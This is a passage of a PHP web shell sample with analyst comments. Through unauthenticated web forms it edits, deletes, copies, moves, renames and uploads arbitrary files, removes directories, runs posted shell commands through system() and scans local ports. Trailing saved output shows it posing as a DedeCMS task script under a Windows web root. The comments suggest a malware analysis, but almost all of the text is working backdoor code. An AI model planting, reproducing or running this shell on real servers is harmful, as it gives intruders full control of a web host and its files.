if (fwrite ($fp, $new)){
echo $file . " edited.<p>";
}
else {
echo "Unable to edit " . $file . ".<p>";
}
}
fclose ($fp);
break;
// delete: unlink() on the "file" query parameter.
case 'delete':
$file = $_GET ['file'];
if (unlink ($file)){
echo $file . " deleted successfully.<p>";
}
else {
echo "Unable to delete " . $file . ".<p>";
}
break;
// copy: source from the query string, destination from the POST body.
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
}
else {
if (copy ($src, $dst)){
echo "File copied successfully.<p>\n";
}
else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
// move: same inputs as copy, done with rename().
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
}
else {
if (rename ($src, $dst)){
echo "File moved successfully.<p>\n";
}
else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
// rename: old name from the query string, new name from the POST body.
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
}
else {
if (rename ($old, $new)){
echo "File/Directory renamed successfully.<p>\n";
}
else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;

// rmdir: removes the directory named in the "rm" query parameter.
case 'rmdir':
$rm = $_GET ['rm'];
if (rmdir ($rm)){
echo "Directory removed successfully.<p>\n";
}
else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
// system: POST "cmd" goes to system() unchanged, i.e. operating-system command execution
// as the PHP process user, with the output written straight into the response.
// Listing system in PHP's disable_functions makes this branch fail but not the file operations.
case 'system':
$cmd = $_POST ['cmd'];
if (empty ($cmd)){
echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
echo "Shell Command: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Run'></form><p>\n";
}
else {
system ($cmd);
}
break;
// create: creates or truncates the file named in POST "new".
case 'create':
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
echo "<tr><td>New file: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
}
else {
if ($fp = fopen ($new, "w")){
echo "File created successfully.<p>\n";
}
else {
// $file is not assigned in this branch, so the message has no name in it.
echo "Unable to create ".$file.".<p>\n";
}
// Also reached when fopen() failed and $fp is false.
fclose ($fp);
}
break;
// upload: writes the uploaded file into the working directory under the client-supplied
// base name, with no check on extension, type or content.
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
}
else {
if(move_uploaded_file($temp,$file)){
echo "File uploaded successfully.<p>\n";
// The temporary file was just moved, so there is nothing left for unlink() to remove.
unlink ($temp);
}
else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;

// port_scan: one TCP connection attempt per port in the POSTed "from:to" range,
// against the hard-coded host localhost (the server the script runs on).
case 'port_scan':
$port_range = $_POST ['port_range'];
if (empty ($port_range)){
echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
}
else {
$range = explode (":", $port_range);
// Only checks that both parts are numeric; the range itself is unbounded.
if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
echo "Bad parameters.<br>";
}
else {
$host = 'localhost';
$from = $range [0];
$to = $range [1];
echo "Open ports:<br>";
while ($from <= $to){
$var = 0;
// "or" binds more loosely than "=": $var is set to 1 only when fsockopen() fails.
$fp = fsockopen ($host, $from) or $var = 1;
// $var still 0 means the connection succeeded; the port number is printed.
// The deobfuscated listing on this page shows `if (false)` at this point, which does not match this line.
if ($var == 0){
echo $from . "<br>";
}
$from++;
// Called after failed connections as well, where $fp is false.
fclose ($fp);
}
}
}
break;


}

// Analyst annotation: comments only; the code below is the sample as published.
// Directory listing, executed on every request regardless of mode: a plain GET of the
// script is enough to enumerate the working directory.
clearstatcache ();

echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
// Relative names, resolved against the directory set by the earlier chdir().
if (is_file ($file)){

// Regular file: size in KB and one link per file operation.
// Names go into the markup unescaped; href values are unquoted.
$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
// The misspelt label "Remame" is in the sample itself and shows up verbatim in its output.
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
}
else {
// Anything that is not a regular file is handled as a directory; the count drops "." and "..".
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td>".$file."</td>";
echo "<td>".$items_num." Items</td>";
// "Change directory" appends "/<name>" to the base URL, extending the dir parameter.
echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
}
}
echo "</table>\n";
// Everything after the closing PHP tag is static text carried inside the sample and sent
// unchanged with each response. It matches the row format printed above but names another
// script path and a Windows directory, so it appears to be earlier shell output that was
// saved into the file on a different host (NOTE(review): inferred from the content; confirm).
?><textarea><br>
<input type = 'submit' value = 'Edit'></form>
<pre>

</pre><table width = 100%>
<tr><td>.</td><td>3 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=.>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=.>Rename directory</a></td></tr>
<tr><td>..</td><td>40 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=..>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=..>Rename directory</a></td></tr>
<tr><td>dede-maketimehtml.php</td><td>0.23 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtml.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtml.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtml.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtml.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtml.php>Remame</a></td></tr>
<tr><td>dede-maketimehtmls.php</td><td>6.58 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtmls.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtmls.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtmls.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtmls.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtmls.php>Remame</a></td></tr>
<tr><td>dede-optimize-table.php</td><td>0.24 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-optimize-table.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-optimize-table.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-optimize-table.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-optimize-table.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-optimize-table.php>Remame</a></td></tr>
</table>